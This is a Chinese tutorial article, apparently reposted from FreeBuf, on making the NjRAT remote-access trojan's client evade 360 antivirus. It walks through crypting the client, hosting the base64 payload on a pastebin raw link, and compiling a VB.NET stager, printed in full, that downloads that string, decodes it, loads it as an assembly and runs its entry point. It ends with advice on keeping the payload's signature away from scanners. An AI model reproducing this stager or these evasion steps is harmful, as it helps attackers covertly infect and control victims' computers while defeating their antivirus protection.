快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

手艺讨论 | NjRAT通过base64编码加密混淆Code免杀绕过360杀毒实验

*

这篇文章在下我主若是教人人怎么样加密免杀国外NjRAT生成的客户端,以达到逃避360杀软检测目的,希翼各位Freebuf小粉喜好。此文章仅用于教育目的,切勿用于非法攻击使用,出现统统执法纠纷与作者无关,全由使用者承担。

image.png

先容

NjRAT也称为Bladabindi  ,是一种遥程走访木马 ,允许程序持有者通过文件传播的方式来控制终极用户的计算机以达到攻击的目的。 它于2013年6月首次被安全工程师发现,其中一些变体追溯到2012年11月。它是由讲阿拉伯语的清真作者编写的,首要用来对付中东其他阿拉伯国家的当局、金融、教育、能源等目标(这可无比清真)。 它可以通过收集钓鱼以及受感染的USB驱动器传播。它被微软恶意软件防护中心评为“严重”。

Freebuf往期关于NjRAT的文章

史上最全的njRAT通讯协定阐发

预备工作:

NjRAT源码 Github 下载地址:传送门

Visual Studio 2017:下载地址传送门

pastebin:传送门

Crypter Server: 传送门提取码 te5h

过程

1.关上NjRAT生成恶意客户端备用

image.png

image.png2.关上Crypter Server混淆工具

image.png

3.点击Crypter Server然后选择刚刚NjRAT生成的恶意客户端

image.png

4.点击确定然后点击Copy

image.png

5.关上pastebin这个网站(www.pastebin.com)

image.png

6.把在Crypter Serve生成的混淆Code粘贴进去

image.png

7.点击Create New Paste

image.png

8.生成出来后点击raw

image.png

9.记住链接我raw出来的链接地址是:https://pastebin.com/raw/niY7M5Npimage.png

10.关上Visual Studio 2017

image.png11.创建一个新的项目

image.png

12.然后选择VisualBasic>windows桌面>Windows 窗体应用(.NET Framework)

image.png

13.然后点击确定进入下面这个界面

image.png

14.双击箭头所唆使的空白处

image.png

15.删除这些Code

image.png

16.Copy下面的Code到内里

Public Class Form1
  Protected loginn As New Net.WebClient
  Protected loginn1 As String = loginn.DownloadString("votre url de votre code,il doit etre visible dans le site")
  Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
      Dim mr As Object = loginn2.load(Convert.FromBase64String(loginn1))
      Dim mr1 As Object = CallByName(mr, "EntryPoint", CallType.Get)
      DirectCast(mr1, Reflection.MethodBase).Invoke("", Nothing)
  End Sub
  Protected loginn2 As Object = AppDomain.CurrentDomain
End Class

image.png上面的Code主若是从服务器得到一个base64编码过的数据,这个数据是一个宏,base64解码以后运行这个宏。

17.把你刚刚在Pastebin网站上raw出来的Code的链接https://pastebin.com/raw/niY7M5Np

Copy进入VB工程,黑客漏洞,把Form1.vb工程中的”votre url de votre code,il doit etre visible dans le site”替代成Pastebin上Raw出来的Code链接。

image.png

18.右击你的项目名称

image.png

19.选择添加模块

image.png

20.选择”模块”然后点击确定

image.png

21.然后把”模块”内里的Code给删除,然后归到”Crypter Server”点击Copy再点击Code,然后点击”Show Code”再点击Copy复制

image.png

24.粘贴到刚刚在VB工程内里创建的模块

image.png

25.点击”项目”>”项目属性”

image.png

26.启用应用程序框架取销打勾

image.png

27.右击项目封装成exe文件生成

image.png

然后关上360杀毒软件进行查杀一下

image.png

扫描日记:

image.png

B站视频链接:https://www.bilibili.com/video/av24811247

演示视频下载链接: https://pan.baidu.com/s/1Ags9tokNtp0AxgrIvX7Jg 暗码: 1hnj

主若是通过base64编码混淆了NjRAT生成的恶意客户端Code,让杀软增添了查杀难度。其次人人不要频仍上传查杀本人生成的Payload以避免被抓取到指纹特征GG。

*

您可能还会对下面的文章感兴趣: